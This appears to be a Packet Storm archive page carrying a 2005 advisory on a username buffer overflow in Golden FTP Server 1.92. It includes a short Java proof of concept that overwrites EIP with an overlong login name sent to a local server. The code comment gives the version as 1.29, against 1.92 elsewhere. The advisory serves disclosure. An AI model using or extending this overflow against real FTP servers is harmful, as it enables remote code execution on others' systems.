exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

goldenFTP192.txt

goldenFTP192.txt
Posted Mar 3, 2005
Authored by Carlos Ulver | Site debarry2.com.br

Golden FTP server version 1.92 suffers from a buffer overflow when more than 284 characters is entered in the Username field at logon. As EIP can be overwritten, it is possible to execute arbitrary code in systems running this version of the daemon.

tags | exploit, overflow, arbitrary
SHA-256 | fb180903ad4f40525a0bd52a26b62cfbed17d7b32acbc0a71a31803bce43357b

goldenFTP192.txt

Change Mirror Download
Golden Ftp Server Username Remote Buffer Overflow 

Date:03/01/2005

Version: Golden Ftp Server 1.92

(Until 01/03/2005 it can be downloaded from
http://www.goldenftpserver.com/golden-ftp-server.zip
SHA-1 Hash of the ZIP file: 9F98D73C46E0F17EF31096F9441B9A9E8ED40CF3
)

Vendor Description:

Golden FTP Server is extremely easy to use personal FTP server for
Windows and can be run by any person who has the most basic computer skills.
http://www.goldenftpserver.com/



Flaw Description:

Golden FTP server suffers from a Buffer Overflow when more than 284
characters is entered in the Username field
at logon.

As EIP can be overwritten, it is possible to execute arbitrary code in
systems running this version of the daemon.


Proof of Concept:

I´m providing just a simple proof of concept for this flaw.

The Poc is also avaliable at www.debarry2.com.br/carlos

======begin code=======

/* Carlos Ulver at gmail.com
* www.debarry2.com.br/carlos
* 03/01/05
* Golden Ftp Server 1.29(Freeware Version) Username Remote Buffer Overflow
* This is only a proof of Concept.
* This Ftpd was running in windows xp sp1 Portuguese(Brazilian)
*
*/
import java.net.URL;
public class Pocgftpd {


public static void main(String[] args) {
String A = new String();

for(int i=0;i<281;i++) A+='a';
for (int i = 0; i < 4; i++) A+='b';

try{
//This 'a' for password means nothing...only to complete: user:pass@host
URL u = new URL("ftp://"+A+":a@127.0.0.1");
u.openStream();
}catch(Exception E1){}

}
}


======end code=======

Correction: For correction, please get a newer version of the FTPD.

For more details and updates and flaws please visit:
http://www.debarry2.com.br/carlos



--
Carlos A. Ulver.
Home: www.debarry2.com.br/carlos
PGP: www.debarry2.com.br/carlos/contato.htm

Brasil - MG
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close